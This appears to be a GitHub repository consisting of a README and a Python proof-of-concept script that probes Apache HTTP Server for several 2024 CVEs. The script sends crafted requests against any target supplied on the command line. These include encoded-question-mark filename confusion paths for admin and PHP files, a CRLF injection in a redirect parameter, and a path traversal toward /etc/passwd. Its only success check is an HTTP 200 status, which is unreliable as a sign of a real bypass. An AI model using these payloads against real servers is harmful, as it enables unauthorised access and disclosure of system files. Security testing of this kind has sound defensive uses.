├── README.md └── poc_vulnerability_testing.py /README.md: -------------------------------------------------------------------------------- 1 | # Apache HTTP Server Vulnerability Testing Tool 2 | 3 | This repository provides a **Proof of Concept (PoC)** for testing various vulnerabilities in the Apache HTTP Server, including Filename Confusion Attacks, SSRF, Denial of Service, and others related to recent CVEs. The tool sends crafted HTTP requests to assess whether the server is vulnerable to certain types of attacks. 4 | 5 | ## Features 6 | - Tests for multiple vulnerabilities including: 7 | - **CVE-2024-38472**: Apache HTTP Server on Windows UNC SSRF 8 | - **CVE-2024-39573**: mod_rewrite proxy handler substitution 9 | - **CVE-2024-38477**: Crash resulting in Denial of Service in mod_proxy 10 | - **CVE-2024-38476**: Exploitable backend application output causing internal redirects 11 | - **CVE-2024-38475**: mod_rewrite weakness with filesystem path matching 12 | - **CVE-2024-38474**: Weakness with encoded question marks in backreferences 13 | - **CVE-2024-38473**: mod_proxy proxy encoding problem 14 | - **CVE-2023-38709**: HTTP response splitting 15 | - Provides an easy-to-use command-line interface for testing various endpoints. 16 | 17 | ## How It Works 18 | The tool performs HTTP requests to potential endpoints that might be vulnerable to confusion attacks or misconfigurations. It checks for specific patterns and encodings that could lead to unauthorized access or system failures. 19 | 20 | ### Testing Targets 21 | The tool checks for vulnerabilities on the following paths: 22 | - **php-info.php** 23 | - **xmlrpc.php** 24 | - **adminer.php** 25 | - **bin/cron.php** 26 | - **cache/index.tpl.php** 27 | - **cgi-bin/redir.cgi** 28 | - Others with encoded URLs for potential bypass. 29 | 30 | ## Getting Started 31 | 32 | ### Prerequisites 33 | - **Python 3.x** installed on your system. 34 | - **Requests** library for Python to send HTTP requests. 35 | 36 | You can install the required Python library using: 37 | ```bash 38 | pip install requests 39 | ``` 40 | ## Installation 41 | Clone this repository: 42 | ```bash 43 | git clone https://github.com/mrmtwoj/apache-vulnerability-testing.git 44 | cd apache-vulnerability-testing 45 | ``` 46 | ### Usage 47 | To use the tool, provide the target URL you want to test: 48 | ```bash 49 | python3 poc_vulnerability_testing.py --target http:// 50 | ``` 51 | ### For example: 52 | ```bash 53 | python3 poc_vulnerability_testing.py --target http://192.168.1.10 54 | ``` 55 | ## Command-Line Arguments 56 | - **target**: The URL of the Apache server to test (e.g., http://example.com). 57 | - **info**: Display tool information, such as the developer name, version, and related CVEs. 58 | - **about**: Display information about the tool and its purpose. 59 | 60 | 61 | -------------------------------------------------------------------------------- /poc_vulnerability_testing.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | # Display basic tool information 5 | def display_info(): 6 | info = """ 7 | Developer : ACyber.ir 8 | Version : 1.0.1 9 | Develop Time : 5-10-2024 10 | CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, 11 | CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, 12 | CVE-2024-38473, CVE-2023-38709 13 | """ 14 | print(info) 15 | 16 | # Display about information 17 | def show_about(): 18 | about_text = """ 19 | This is a Proof of Concept (PoC) for testing various vulnerabilities 20 | in Apache HTTP Server including SSRF, Denial of Service, and Filename Confusion Attacks. 21 | Developed by the A Cyber Security Team. 22 | """ 23 | print(about_text) 24 | 25 | # Function to test the vulnerability with multiple bypass attempts 26 | def check_protected_file(target_url): 27 | # List of potential attack URLs 28 | test_urls = [ 29 | f"{target_url}/php-info.php%3fooo.php", # Filename Confusion: php-info.php 30 | f"{target_url}/xmlrpc.php%3fooo.php", # Filename Confusion: xmlrpc.php 31 | f"{target_url}/adminer.php%3fooo.php", # Filename Confusion: adminer.php 32 | f"{target_url}/bin/cron.php%3fooo.php", # Filename Confusion: cron.php 33 | f"{target_url}/cache/index.tpl.php%3fooo.php", # Filename Confusion: index.tpl.php 34 | f"{target_url}/cgi-bin/redir.cgi?r=http://%0d%0a", # Invoking Server-Status Handler 35 | f"{target_url}/server-status", # Testing server-status handler directly 36 | f"{target_url}/admin.php%2f%3fooo.php", # Bypass using alternate encodings 37 | f"{target_url}/admin.php/%2e%2e%2fetc/passwd", # Path Traversal Example 38 | ] 39 | 40 | # Loop through each URL and test the response 41 | for test_url in test_urls: 42 | print(f"Testing URL: {test_url}") 43 | response = requests.get(test_url) 44 | 45 | # Display response status code and check for potential bypass success 46 | print(f"URL Status Code: {response.status_code}") 47 | if response.status_code == 200: 48 | print(f"[!] Bypass successful for URL: {test_url}") 49 | else: 50 | print(f"[*] No bypass or blocked for URL: {test_url}") 51 | print("-" * 50) 52 | 53 | # Function to handle command-line arguments 54 | def parse_arguments(): 55 | parser = argparse.ArgumentParser(description="Apache HTTP Server Vulnerability Testing Tool") 56 | parser.add_argument('--target', type=str, help='Target URL to test (e.g., http://example.com)', required=True) 57 | parser.add_argument('--info', action='store_true', help='Display tool information') 58 | parser.add_argument('--about', action='store_true', help='Show about this PoC') 59 | return parser.parse_args() 60 | 61 | if __name__ == "__main__": 62 | # Automatically display tool info when the script starts 63 | display_info() 64 | 65 | # Parse command-line arguments 66 | args = parse_arguments() 67 | 68 | # Display about information if --about is provided 69 | if args.about: 70 | show_about() 71 | 72 | # Run the attack check if --target is provided 73 | if args.target: 74 | check_protected_file(args.target) 75 | else: 76 | if not args.info and not args.about: 77 | print("Please provide a target URL with --target, or use --info or --about for more information.") 78 | --------------------------------------------------------------------------------